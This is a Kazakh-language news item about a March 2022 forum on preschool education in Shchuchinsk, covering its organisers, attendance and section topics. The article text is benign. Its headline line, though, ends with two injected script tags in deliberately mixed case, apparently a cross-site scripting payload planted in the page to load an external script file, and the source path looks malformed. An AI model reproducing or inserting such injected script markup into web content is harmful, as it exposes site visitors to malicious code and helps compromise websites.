"Заманауи мектепке дейінгі тәрбие мен оқыту: үрдістер, мәселелері, келешегі" форумы өтті<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
26.03.2022
24 наурызда Щучинск қаласындағы жоғары педагогикалық колледжінде мектепке дейінгі тәрбие мен оқыту жүйесінің педагогтері үшін "Заманауи мектепке дейінгі тәрбие мен оқыту: үрдістер, мәселелері, келешегі" форумы өтті. Форум жұмысына Ақмола облысы білім басқармасының басшысы Бейбіт Жүсіпов қатысты. Ақмола облысы білім басқармасының облыстық оқу-әдістемелік кабинеті ұйымдастырған шараға аудандық, қалалық білім бөлімдерінің әдіскерлері, мектепке дейінгі ұйымдардың меңгерушілері, әдіскерлері мен педагогтері, Ш.Уәлиханов атындағы Көкшетау университетінің, колледждердің, біліктілікті арттыру институтының мамандары шақырылды. Барлығы 70-тен астам адам оффлайн қатысып, онлайн режимде 400 адам тамашалай алды. Форум 2 кезеңде өтті: секциялар жұмысы және пленарлық отырыс. Бірінші бөлімде "Мектепке дейінгі тәрбие мен оқытуды ғылыми негіздеу және қолдау", "Сапа өлшемшарттары және менеджмент", "Ойын - баланың негізгі әрекеті және дамытудың негізгі құралы", "Мектепке дейінгі білім беру педагогтерінің кәсіби және тұлғалық өсуі" тақырыптары бойынша бірнеше секция ұйымдастырылды.


